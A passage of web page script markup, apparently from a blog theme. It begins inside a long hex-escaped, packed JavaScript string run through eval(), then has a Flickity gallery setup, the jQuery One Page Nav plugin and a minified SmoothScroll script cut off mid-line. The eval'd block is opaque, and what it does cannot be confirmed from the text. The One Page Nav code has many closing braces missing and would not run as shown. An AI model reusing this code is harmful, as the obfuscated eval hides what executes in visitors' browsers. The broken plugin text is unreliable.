d\x28\x30\x2c\x31\x4d\x29\x2b\x61\x5b\x33\x72\x5d\x29\x3b\x41\x20\x32\x74\x3d\x44\x5b\x61
\x5b\x4a\x5d\x5d\x5b\x61\x5b\x4c\x5d\x5d\x5b\x48\x5d\x5b\x61\x5b\x31\x32\x5d\x5d\x5b\x61\
x5b\x31\x6e\x5d\x5d\x3b\x41\x20\x32\x4b\x3d\x44\x5b\x61\x5b\x4a\x5d\x5d\x5b\x61\x5b\x4c\x
5d\x5d\x5b\x48\x5d\x5b\x61\x5b\x33\x46\x5d\x5d\x5b\x30\x5d\x5b\x61\x5b\x33\x53\x5d\x5d\x
3b\x41\x20\x32\x73\x3d\x44\x5b\x61\x5b\x4a\x5d\x5d\x5b\x61\x5b\x4c\x5d\x5d\x5b\x48\x5d\x5
b\x61\x5b\x31\x4d\x5d\x5d\x5b\x30\x5d\x5b\x61\x5b\x33\x52\x5d\x5d\x5b\x61\x5b\x31\x6e\x5
d\x5d\x3b\x41\x20\x33\x51\x3d\x44\x5b\x61\x5b\x4a\x5d\x5d\x5b\x61\x5b\x4c\x5d\x5d\x5b\x48
\x5d\x5b\x61\x5b\x31\x4d\x5d\x5d\x5b\x30\x5d\x5b\x61\x5b\x33\x54\x5d\x5d\x5b\x61\x5b\x31\
x79\x5d\x5d\x3b\x41\x20\x31\x41\x3d\x44\x5b\x61\x5b\x4a\x5d\x5d\x5b\x61\x5b\x4c\x5d\x5d\x
5b\x48\x5d\x5b\x61\x5b\x33\x55\x5d\x5d\x5b\x61\x5b\x31\x6e\x5d\x5d\x2c\x32\x41\x3d\x31\x4
1\x5b\x61\x5b\x31\x7a\x5d\x5d\x28\x30\x2c\x34\x29\x2c\x32\x79\x3d\x31\x41\x5b\x61\x5b\x31
\x7a\x5d\x5d\x28\x35\x2c\x37\x29\x2c\x32\x42\x3d\x31\x41\x5b\x61\x5b\x31\x7a\x5d\x5d\x28\
x38\x2c\x31\x30\x29\x2c\x32\x76\x3d\x33\x49\x5b\x32\x78\x28\x32\x79\x2c\x31\x30\x29\x5d\x
2b\x61\x5b\x33\x47\x5d\x2b\x32\x42\x2b\x61\x5b\x33\x4a\x5d\x2b\x32\x41\x3b\x41\x20\x31\x4
4\x3d\x44\x5b\x61\x5b\x4a\x5d\x5d\x5b\x61\x5b\x4c\x5d\x5d\x5b\x48\x5d\x5b\x61\x5b\x31\x5a
\x5d\x5d\x5b\x61\x5b\x31\x6e\x5d\x5d\x3b\x41\x20\x32\x7a\x3d\x24\x28\x61\x5b\x33\x4b\x5d\
x29\x5b\x61\x5b\x33\x37\x5d\x5d\x28\x31\x44\x29\x3b\x47\x28\x31\x44\x5b\x61\x5b\x32\x34\x
5d\x5d\x28\x61\x5b\x33\x4e\x5d\x29\x3e\x2d\x31\x29\x7b\x41\x20\x56\x3d\x44\x5b\x61\x5b\x4
a\x5d\x5d\x5b\x61\x5b\x4c\x5d\x5d\x5b\x48\x5d\x5b\x61\x5b\x33\x4d\x5d\x5d\x5b\x61\x5b\x33
\x4c\x5d\x5d\x3b\x41\x20\x50\x3d\x56\x7d\x4b\x7b\x47\x28\x31\x44\x5b\x61\x5b\x32\x34\x5d\
x5d\x28\x61\x5b\x33\x59\x5d\x29\x3e\x2d\x31\x29\x7b\x41\x20\x32\x43\x3d\x32\x7a\x5b\x61\x
5b\x32\x32\x5d\x5d\x28\x61\x5b\x33\x48\x5d\x29\x5b\x61\x5b\x32\x30\x5d\x5d\x28\x61\x5b\x
31\x79\x5d\x29\x3b\x41\x20\x50\x3d\x32\x43\x7d\x4b\x7b\x41\x20\x50\x3d\x33\x4f\x7d\x7d\x3
b\x31\x46\x2b\x3d\x61\x5b\x33\x50\x5d\x2b\x31\x45\x2b\x61\x5b\x33\x56\x5d\x2b\x50\x2b\x6
1\x5b\x33\x57\x5d\x2b\x31\x45\x2b\x61\x5b\x33\x58\x5d\x2b\x32\x74\x2b\x61\x5b\x33\x73\x5
d\x2b\x32\x73\x2b\x61\x5b\x33\x74\x5d\x2b\x32\x76\x2b\x61\x5b\x33\x71\x5d\x2b\x31\x65\x2
b\x61\x5b\x33\x75\x5d\x7d\x3b\x31\x46\x2b\x3d\x61\x5b\x33\x7a\x5d\x3b\x24\x28\x61\x5b\x32
\x44\x5d\x29\x5b\x61\x5b\x33\x31\x5d\x5d\x28\x4e\x28\x29\x7b\x41\x20\x31\x62\x3d\x24\x28\
x51\x29\x5b\x61\x5b\x34\x32\x5d\x5d\x28\x29\x5b\x61\x5b\x32\x30\x5d\x5d\x28\x61\x5b\x33\x
39\x5d\x29\x3b\x47\x28\x31\x62\x3d\x3d\x32\x45\x29\x7b\x24\x28\x51\x29\x5b\x61\x5b\x33\x3
7\x5d\x5d\x28\x31\x46\x29\x3b\x24\x28\x51\x29\x5b\x61\x5b\x34\x32\x5d\x5d\x28\x29\x5b\x61
\x5b\x34\x33\x5d\x5d\x28\x61\x5b\x32\x4d\x5d\x29\x3b\x24\x28\x51\x29\x5b\x61\x5b\x34\x32\
x5d\x5d\x28\x29\x5b\x61\x5b\x34\x33\x5d\x5d\x28\x61\x5b\x32\x4e\x5d\x29\x3b\x24\x28\x51\x
29\x5b\x61\x5b\x31\x52\x5d\x5d\x28\x61\x5b\x32\x68\x5d\x29\x5b\x61\x5b\x33\x79\x5d\x5d\x
28\x61\x5b\x33\x5a\x5d\x2b\x32\x4b\x2b\x61\x5b\x34\x66\x5d\x29\x3b\x24\x28\x51\x29\x5b\x6
1\x5b\x31\x52\x5d\x5d\x28\x61\x5b\x32\x68\x5d\x29\x5b\x61\x5b\x34\x78\x5d\x5d\x28\x61\x5
b\x34\x79\x5d\x29\x3b\x24\x28\x61\x5b\x34\x7a\x5d\x29\x5b\x61\x5b\x34\x33\x5d\x5d\x28\x61
\x5b\x34\x77\x5d\x29\x5b\x61\x5b\x34\x76\x5d\x5d\x28\x61\x5b\x34\x42\x5d\x29\x3b\x24\x28\
x61\x5b\x34\x43\x5d\x29\x5b\x61\x5b\x32\x6d\x5d\x5d\x28\x29\x3b\x24\x28\x51\x29\x5b\x61\x
5b\x32\x32\x5d\x5d\x28\x61\x5b\x34\x74\x5d\x29\x5b\x61\x5b\x33\x31\x5d\x5d\x28\x4e\x28\x2
9\x7b\x24\x28\x51\x29\x5b\x61\x5b\x32\x30\x5d\x5d\x28\x61\x5b\x31\x34\x5d\x2c\x4e\x28\x48
\x2c\x31\x48\x29\x7b\x4d\x20\x31\x48\x5b\x61\x5b\x32\x37\x5d\x5d\x28\x61\x5b\x31\x49\x5d\
x2c\x61\x5b\x31\x6b\x5d\x29\x7d\x29\x5b\x61\x5b\x32\x30\x5d\x5d\x28\x61\x5b\x31\x34\x5d\x
2c\x4e\x28\x48\x2c\x31\x48\x29\x7b\x4d\x20\x31\x48\x5b\x61\x5b\x32\x37\x5d\x5d\x28\x61\x5
b\x31\x4a\x5d\x2c\x61\x5b\x34\x65\x5d\x29\x7d\x29\x7d\x29\x7d\x7d\x29\x7d\x7d\x29\x7d\x4b
\x7b\x24\x28\x61\x5b\x34\x64\x5d\x29\x5b\x61\x5b\x34\x61\x5d\x5d\x28\x29\x7d\x7d\x29\x3b\
x24\x28\x4e\x28\x29\x7b\x24\x28\x61\x5b\x34\x62\x5d\x29\x5b\x61\x5b\x32\x6d\x5d\x5d\x28\x
29\x3b\x24\x28\x61\x5b\x34\x63\x5d\x29\x5b\x61\x5b\x34\x32\x5d\x5d\x28\x61\x5b\x32\x31\x5
d\x29\x5b\x61\x5b\x34\x68\x5d\x5d\x28\x61\x5b\x34\x69\x5d\x2c\x61\x5b\x34\x67\x5d\x29\x7d
\x29\x5c\x27\x2c\x36\x32\x2c\x36\x64\x2c\x5c\x27\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x36
\x63\x7c\x36\x62\x7c\x35\x5a\x7c\x35\x4e\x7c\x35\x59\x7c\x35\x58\x7c\x7c\x35\x57\x7c\x35\x5
6\x7c\x35\x55\x7c\x35\x54\x7c\x35\x53\x7c\x35\x52\x7c\x35\x51\x7c\x35\x50\x7c\x35\x4f\x7c\x
36\x6d\x7c\x36\x61\x7c\x36\x6e\x7c\x36\x43\x7c\x36\x4e\x7c\x36\x4d\x7c\x36\x4c\x7c\x36\x4b
\x7c\x36\x4a\x7c\x36\x49\x7c\x36\x48\x7c\x36\x47\x7c\x36\x46\x7c\x36\x45\x7c\x36\x44\x7c\x3
6\x42\x7c\x34\x48\x7c\x36\x70\x7c\x36\x41\x7c\x38\x36\x7c\x36\x7a\x7c\x38\x35\x7c\x34\x47\
x7c\x34\x46\x7c\x36\x79\x7c\x36\x78\x7c\x36\x77\x7c\x35\x36\x7c\x7c\x36\x76\x7c\x36\x75\x7c
\x36\x74\x7c\x36\x73\x7c\x36\x72\x7c\x36\x71\x7c\x35\x4c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c
\x7c\x7c\x35\x4d\x7c\x35\x6a\x7c\x35\x4b\x7c\x35\x67\x7c\x35\x66\x7c\x35\x65\x7c\x35\x64\x7
c\x35\x63\x7c\x35\x62\x7c\x35\x61\x7c\x35\x38\x7c\x38\x37\x7c\x34\x5a\x7c\x34\x59\x7c\x34\x
55\x7c\x34\x57\x7c\x34\x56\x7c\x34\x54\x7c\x36\x38\x7c\x34\x53\x7c\x34\x52\x7c\x34\x51\x7c
\x34\x50\x7c\x34\x4f\x7c\x35\x34\x7c\x34\x4e\x7c\x34\x4d\x7c\x34\x4c\x7c\x34\x4b\x7c\x35\x6
8\x7c\x34\x58\x7c\x35\x69\x7c\x35\x78\x7c\x35\x4a\x7c\x36\x30\x7c\x36\x31\x7c\x35\x49\x7c\x
35\x48\x7c\x35\x47\x7c\x35\x46\x7c\x35\x35\x7c\x36\x36\x7c\x35\x39\x7c\x37\x34\x7c\x35\x45
\x7c\x35\x37\x7c\x35\x44\x7c\x35\x43\x7c\x35\x42\x7c\x36\x34\x7c\x37\x36\x7c\x35\x41\x7c\x7
c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x36\x35\x7c\x35\x7a\x7c\x35\x79\x7c\x36\x32\x7c\x35\x7
7\x7c\x35\x6b\x7c\x35\x76\x7c\x37\x33\x7c\x35\x75\x7c\x35\x74\x7c\x35\x73\x7c\x35\x72\x7c\x
35\x71\x7c\x35\x70\x7c\x35\x6f\x7c\x35\x6e\x7c\x35\x6d\x7c\x35\x6c\x7c\x36\x4f\x7c\x36\x6f\x
7c\x36\x51\x7c\x37\x74\x7c\x37\x54\x7c\x34\x49\x7c\x38\x71\x7c\x38\x6f\x7c\x38\x6e\x7c\x38\
x6d\x7c\x38\x6c\x7c\x38\x6b\x7c\x38\x6a\x7c\x36\x33\x7c\x38\x68\x7c\x38\x67\x7c\x38\x64\x7
c\x37\x53\x7c\x38\x63\x7c\x38\x61\x7c\x37\x39\x7c\x37\x58\x7c\x35\x30\x7c\x35\x32\x7c\x35\x
33\x7c\x37\x55\x7c\x38\x70\x7c\x38\x65\x7c\x38\x72\x7c\x38\x44\x7c\x38\x73\x7c\x38\x42\x7c
\x38\x41\x7c\x38\x7a\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x38\x79\x7c\x38\x78\x7c\x38
\x43\x7c\x38\x77\x7c\x38\x76\x7c\x35\x31\x7c\x38\x75\x7c\x38\x74\x7c\x37\x52\x7c\x37\x71\x
7c\x37\x50\x7c\x37\x35\x7c\x37\x6e\x7c\x37\x6d\x7c\x38\x39\x7c\x37\x6c\x7c\x37\x6b\x7c\x37\
x6a\x7c\x37\x69\x7c\x37\x68\x7c\x37\x67\x7c\x38\x38\x7c\x38\x32\x7c\x37\x66\x7c\x37\x65\x7
c\x37\x63\x7c\x36\x52\x7c\x38\x34\x7c\x37\x62\x7c\x38\x33\x7c\x37\x61\x7c\x36\x5a\x7c\x36\x
59\x7c\x36\x58\x7c\x36\x57\x7c\x36\x56\x7c\x36\x55\x7c\x37\x51\x7c\x36\x54\x7c\x36\x53\x7c
\x37\x6f\x7c\x37\x64\x7c\x37\x70\x7c\x37\x44\x7c\x37\x4f\x7c\x37\x4e\x7c\x37\x4d\x7c\x37\x4
c\x7c\x37\x4b\x7c\x37\x4a\x7c\x37\x49\x7c\x37\x48\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7
c\x37\x47\x7c\x37\x46\x7c\x37\x45\x7c\x37\x43\x7c\x37\x72\x7c\x37\x42\x7c\x37\x41\x7c\x37\x
7a\x7c\x37\x79\x7c\x36\x39\x7c\x36\x37\x7c\x37\x78\x7c\x37\x32\x7c\x37\x30\x7c\x37\x77\x7c
\x37\x31\x7c\x37\x38\x7c\x37\x37\x7c\x38\x31\x7c\x37\x76\x7c\x38\x30\x7c\x37\x75\x7c\x37\x
73\x7c\x37\x56\x7c\x37\x57\x7c\x37\x59\x7c\x37\x5a\x7c\x38\x62\x7c\x38\x66\x7c\x38\x69\x7c
\x36\x65\x5c\x27\x2e\x34\x4a\x28\x5c\x27\x7c\x5c\x27\x29\x29\x29\x27\x2c\x36\x32\x2c\x35\x
33\x36\x2c\x27\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7
c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c
\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\
x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x
7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7
c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c
\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\
x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x
7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7
c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c
\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\
x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x
7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x
72\x65\x74\x75\x72\x6e\x7c\x69\x66\x7c\x70\x61\x72\x73\x65\x49\x6e\x74\x7c\x73\x70\x6c\x69
\x74\x7c\x78\x35\x34\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\x35\x7c\x5f\x30\x78\x39\x66\x3
4\x33\x78\x31\x63\x7c\x39\x35\x7c\x78\x34\x39\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\x34\
x7c\x78\x33\x33\x7c\x64\x6f\x63\x75\x6d\x65\x6e\x74\x7c\x78\x33\x36\x7c\x6c\x65\x76\x65\x6
c\x7c\x78\x34\x43\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x34\x7c\x78\x33\x37\x7c\x5f\x30\x78\x
39\x66\x34\x33\x78\x31\x31\x7c\x39\x33\x7c\x78\x33\x31\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\
x7c\x7c\x66\x6f\x72\x7c\x78\x32\x33\x7c\x78\x32\x31\x7c\x78\x36\x41\x7c\x78\x34\x31\x7c\x5f
\x30\x78\x39\x66\x34\x33\x78\x31\x36\x7c\x78\x33\x32\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x
32\x31\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\x32\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x36
\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x37\x7c\x39\x34\x7c\x6c\x61\x62\x65\x6c\x7c\x5f\x30\x7
8\x39\x66\x34\x33\x78\x65\x7c\x77\x69\x6e\x64\x6f\x77\x7c\x6f\x66\x66\x73\x65\x74\x7c\x31\x
33\x30\x7c\x70\x72\x65\x70\x65\x6e\x64\x54\x6f\x7c\x78\x32\x37\x7c\x5f\x30\x78\x39\x66\x34
\x33\x78\x64\x7c\x78\x35\x33\x7c\x78\x34\x44\x7c\x78\x32\x43\x7c\x78\x33\x35\x7c\x5f\x30\x
78\x39\x66\x34\x33\x78\x31\x30\x7c\x78\x37\x31\x7c\x39\x32\x7c\x5f\x30\x78\x39\x66\x34\x33
\x78\x61\x7c\x78\x34\x38\x7c\x78\x37\x41\x7c\x78\x32\x34\x7c\x78\x34\x32\x7c\x31\x30\x30\x
7c\x78\x35\x30\x7c\x78\x34\x33\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x32\x34\x7c\x5f\x30\x78\
x39\x66\x34\x33\x78\x38\x7c\x78\x33\x30\x7c\x78\x33\x42\x7c\x78\x36\x31\x7c\x78\x37\x30\x7
c\x78\x32\x44\x7c\x78\x32\x30\x7c\x78\x36\x34\x7c\x78\x36\x46\x7c\x78\x36\x44\x7c\x78\x37\
x32\x7c\x78\x36\x45\x7c\x78\x36\x43\x7c\x78\x37\x33\x7c\x78\x36\x39\x7c\x78\x36\x35\x7c\x7
c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x78\x36\x33\x7c\x78\x37\x34\x7c\x5f\x30\x78\x32\x39\x3
4\x35\x7c\x32\x38\x39\x7c\x31\x33\x35\x7c\x52\x65\x67\x45\x78\x70\x7c\x6e\x65\x77\x7c\x72\
x65\x70\x6c\x61\x63\x65\x7c\x77\x68\x69\x6c\x65\x7c\x74\x6f\x53\x74\x72\x69\x6e\x67\x7c\x6
6\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x7c\x53\x74\x72\x69\x6e\x67\x7c\x78\x37\x35\
x7c\x78\x32\x46\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\x38\x7c\x5f\x30\x78\x39\x66\x34\x3
3\x78\x31\x33\x7c\x78\x36\x42\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x32\x7c\x5f\x30\x78\x39\x
66\x34\x33\x78\x39\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x35\x7c\x78\x33\x41\x7c\x78\x37\x38
\x7c\x74\x68\x69\x73\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x33\x7c\x78\x37\x37\x7c\x65\x6c\x
73\x65\x7c\x78\x33\x44\x7c\x78\x37\x36\x7c\x78\x32\x45\x7c\x78\x36\x36\x7c\x5f\x30\x78\x39
\x66\x34\x33\x78\x31\x7c\x78\x36\x32\x7c\x78\x32\x32\x7c\x76\x61\x72\x7c\x5f\x30\x78\x39\x
66\x34\x33\x78\x62\x7c\x78\x36\x38\x7c\x78\x33\x43\x7c\x78\x36\x37\x7c\x78\x33\x45\x7c\x78
\x37\x39\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\x61\x7c\x65\x76\x61\x6c\x7c\x78\x32\x36\x
7c\x64\x61\x74\x61\x54\x79\x70\x65\x7c\x31\x30\x36\x7c\x31\x30\x38\x7c\x31\x30\x35\x7c\x31
\x30\x34\x7c\x6d\x6f\x6e\x74\x68\x5f\x66\x6f\x72\x6d\x61\x74\x7c\x31\x31\x30\x7c\x31\x30\x3
3\x7c\x39\x38\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x74\x69\x6d\x65\x7c\x73\x75\x63\x
63\x65\x73\x73\x7c\x31\x31\x39\x7c\x31\x31\x31\x7c\x31\x32\x33\x7c\x74\x79\x70\x65\x7c\x31
\x31\x38\x7c\x31\x31\x36\x7c\x31\x31\x35\x7c\x39\x36\x7c\x31\x31\x37\x7c\x62\x5f\x72\x63\x
7c\x39\x30\x7c\x39\x31\x7c\x6e\x6f\x5f\x69\x6d\x61\x67\x65\x7c\x5f\x30\x78\x39\x66\x34\x33\
x78\x31\x62\x7c\x33\x30\x30\x30\x7c\x31\x33\x32\x7c\x31\x32\x38\x7c\x5f\x30\x78\x39\x66\x3
4\x33\x78\x32\x30\x7c\x31\x32\x37\x7c\x31\x33\x33\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x63\
x7c\x31\x30\x30\x30\x7c\x31\x33\x39\x7c\x31\x34\x31\x7c\x31\x34\x30\x7c\x31\x32\x32\x7c\x3
1\x33\x37\x7c\x39\x39\x7c\x31\x34\x32\x7c\x31\x33\x38\x7c\x31\x33\x36\x7c\x31\x32\x31\x7c\
x31\x30\x39\x7c\x31\x31\x34\x7c\x31\x31\x33\x7c\x31\x31\x32\x7c\x31\x30\x32\x7c\x31\x30\x3
1\x7c\x39\x37\x7c\x78\x34\x46\x7c\x31\x30\x37\x7c\x73\x65\x74\x49\x6e\x74\x65\x72\x76\x61\
x6c\x7c\x78\x33\x39\x7c\x78\x33\x46\x7c\x78\x35\x46\x7c\x31\x32\x35\x7c\x31\x32\x34\x7c\x3
1\x32\x30\x7c\x31\x32\x39\x7c\x75\x72\x6c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x5f\x3
0\x78\x39\x66\x34\x33\x78\x31\x37\x7c\x31\x32\x36\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\
x39\x7c\x78\x34\x35\x7c\x6a\x51\x75\x65\x72\x79\x7c\x31\x33\x31\x7c\x62\x72\x65\x61\x6b\x7
c\x69\x6e\x7c\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x66\
x7c\x31\x33\x34\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x32\x33\x7c\x5f\x30\x78\x39\x66\x34\x3
3\x78\x31\x66\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\x64\x7c\x5f\x30\x78\x39\x66\x34\x33\
x78\x32\x32\x7c\x78\x34\x36\x7c\x5f\x30\x78\x39\x66\x34\x33\x78\x31\x65\x7c\x78\x35\x36\x7
c\x78\x33\x34\x7c\x5f\x7c\x67\x69\x7c\x78\x35\x35\x7c\x78\x35\x39\x7c\x78\x32\x39\x7c\x64\x
65\x6c\x61\x79\x7c\x78\x32\x38\x7c\x78\x34\x42\x7c\x78\x35\x31\x7c\x78\x33\x38\x7c\x78\x35
\x37\x27\x2e\x73\x70\x6c\x69\x74\x28\x27\x7c\x27\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x0a";eval(
_o6VDbm);

//]]>

</script>

<script>var flkty = new Flickity( &#39;.main-gallery&#39;, {

cellAlign: &#39;left&#39;,

contain: true,

wrapAround: true,

prevNextButtons: true,

autoPlay: 5000

});

</script>

<script id='navPlugin' language='javascript' type='text/javascript'>//<![CDATA[

/*

* jQuery One Page Nav Plugin

* http://github.com/davist11/jQuery-One-Page-Nav

* Copyright (c) 2010 Trevor Davis (http://trevordavis.net)

* Dual licensed under the MIT and GPL licenses.

* Uses the same license as jQuery, see:

* http://jquery.org/license

* @version 3.0.0

* Example usage:

* $('#nav').onePageNav({

* currentClass: 'current',
* changeHash: false,

* scrollSpeed: 750

* });

*/

;(function($, window, document, undefined){

// our plugin constructor

var OnePageNav = function(elem, options){

this.elem = elem;

this.$elem = $(elem);

this.options = options;

this.metadata = this.$elem.data('plugin-options');

this.$win = $(window);

this.sections = {};

this.didScroll = false;

this.$doc = $(document);

this.docHeight = this.$doc.height();

};

// the plugin prototype

OnePageNav.prototype = {

defaults: {

navItems: 'a',

currentClass: 'current',

changeHash: false,

easing: 'swing',

filter: '',

scrollSpeed: 750,

scrollThreshold: 0.5,

begin: false,
end: false,

scrollChange: false

},

init: function() {

// Introduce defaults that can be extended either

// globally or using an object literal.

this.config = $.extend({}, this.defaults, this.options, this.metadata);

this.$nav = this.$elem.find(this.config.navItems);

//Filter any links out of the nav

if(this.config.filter !== '') {

this.$nav = this.$nav.filter(this.config.filter);

//Handle clicks on the nav

this.$nav.on('click.onePageNav', $.proxy(this.handleClick, this));

//Get the section positions

this.getPositions();

//Handle scroll changes

this.bindInterval();

//Update the positions on resize too

this.$win.on('resize.onePageNav', $.proxy(this.getPositions, this));

return this;

},
adjustNav: function(self, $parent) {

self.$elem.find('.' +
self.config.currentClass).removeClass(self.config.currentClass);

$parent.addClass(self.config.currentClass);

},

bindInterval: function() {

var self = this;

var docHeight;

self.$win.on('scroll.onePageNav', function() {

self.didScroll = true;

});

self.t = setInterval(function() {

docHeight = self.$doc.height();

//If it was scrolled

if(self.didScroll) {

self.didScroll = false;

self.scrollChange();

//If the document height changes

if(docHeight !== self.docHeight) {

self.docHeight = docHeight;

self.getPositions();

}, 250);

},
getHash: function($link) {

return $link.attr('href').split('#')[1];

},

getPositions: function() {

var self = this;

var linkHref;

var topPos;

var $target;

self.$nav.each(function() {

linkHref = self.getHash($(this));

$target = $('#' + linkHref);

if($target.length) {

topPos = $target.offset().top;

self.sections[linkHref] = Math.round(topPos);

});

},

getSection: function(windowPos) {

var returnValue = null;

var windowHeight = Math.round(this.$win.height() *


this.config.scrollThreshold);

for(var section in this.sections) {

if((this.sections[section] - windowHeight) < windowPos) {

returnValue = section;

}
return returnValue;

},

handleClick: function(e) {

var self = this;

var $link = $(e.currentTarget);

var $parent = $link.parent();

var newLoc = '#' + self.getHash($link);

if(!$parent.hasClass(self.config.currentClass)) {

//Start callback

if(self.config.begin) {

self.config.begin();

//Change the highlighted nav item

self.adjustNav(self, $parent);

//Removing the auto-adjust on scroll

self.unbindInterval();

//Scroll to the correct position

self.scrollTo(newLoc, function() {

//Do we need to change the hash?

if(self.config.changeHash) {

window.location.hash = newLoc;

//Add the auto-adjust on scroll back in

self.bindInterval();
//End callback

if(self.config.end) {

self.config.end();

});

e.preventDefault();

},

scrollChange: function() {

var windowTop = this.$win.scrollTop();

var position = this.getSection(windowTop);

var $parent;

//If the position is set

if(position !== null) {

$parent = this.$elem.find('a[href$="#' + position + '"]').parent();

//If it's not already the current section

if(!$parent.hasClass(this.config.currentClass)) {

//Change the highlighted nav item

this.adjustNav(this, $parent);

//If there is a scrollChange callback

if(this.config.scrollChange) {

this.config.scrollChange($parent);

}
},

scrollTo: function(target, callback) {

var offset = $(target).offset().top;

$('html, body').animate({

scrollTop: offset

}, this.config.scrollSpeed, this.config.easing, callback);

},

unbindInterval: function() {

clearInterval(this.t);

this.$win.unbind('scroll.onePageNav');

};

OnePageNav.defaults = OnePageNav.prototype.defaults;

$.fn.onePageNav = function(options) {

return this.each(function() {

new OnePageNav(this, options).init();

});

};

})( jQuery, window , document );

//]]></script>

<script>

$(document).ready(function() {

$(&#39;#nav&#39;).onePageNav();

});

$(document).ready(function() {
$(&#39;.slide-in&#39;).onePageNav();

});

</script>

<script language='javascript' type='text/javascript'>//<![CDATA[

// SmoothScroll for websites v1.2.1

// Licensed under the terms of the MIT license.

// People involved

// - Balazs Galambosi (maintainer)

// - Michael Herf (Pulse Algorithm)

!function(){function e(){var e=!1;e&&c("keydown",r),v.keyboardSupport&&!


e&&u("keydown",r)}function t(){if(document.body){var
t=document.body,o=document.documentElement,n=window.innerHeight,r=t.scrollHeight;if(S=docu
ment.compatMode.indexOf("CSS")>=0?o:t,w=t,e(),x=!0,top!=self)y=!0;else
if(r>n&&(t.offsetHeight<=n||o.offsetHeight<=n)){var a=!1,i=function(){a||
o.scrollHeight==document.height||(a=!0,setTimeout(function()
{o.style.height=document.height+"px",a=!
1},500))};if(o.style.height="auto",setTimeout(i,10),S.offsetHeight<=n){var
l=document.createElement("div");l.style.clear="both",t.appendChild(l)}}v.fixedBackground||b||
(t.style.backgroundAttachment="scroll",o.style.backgroundAttachment="scroll")}}function o(e,t,o,n)
{if(n||(n=1e3),d(t,o),1!=v.accelerationMax){var r=+new Date,a=r-C;if(a<v.accelerationDelta){var
i=(1+30/a)/2;i>1&&(i=Math.min(i,v.accelerationMax),t*=i,o*=i)}C=+new
Date}if(M.push({x:t,y:o,lastX:0>t?.99:-.99,lastY:0>o?.99:-.99,start:+new Date}),!T){var
l=e===document.body,u=function(){for(var r=+new Date,a=0,i=0,c=0;c<M.length;c++){var
s=M[c],d=r-s.start,f=d>=v.animationTime,h=f?1:d/v.animationTime;v.pulseAlgorithm&&(h=p(h));var
m=s.x*h-s.lastX>>0,w=s.y*h-s.lastY>>0;a+=m,i+=w,s.lastX+=m,s.lastY+=w,f&&(M.splice(c,1),c--)}l?
window.scrollBy(a,i):(a&&(e.scrollLeft+=a),i&&(e.scrollTop+=i)),t||o||(M=[]),M.length?
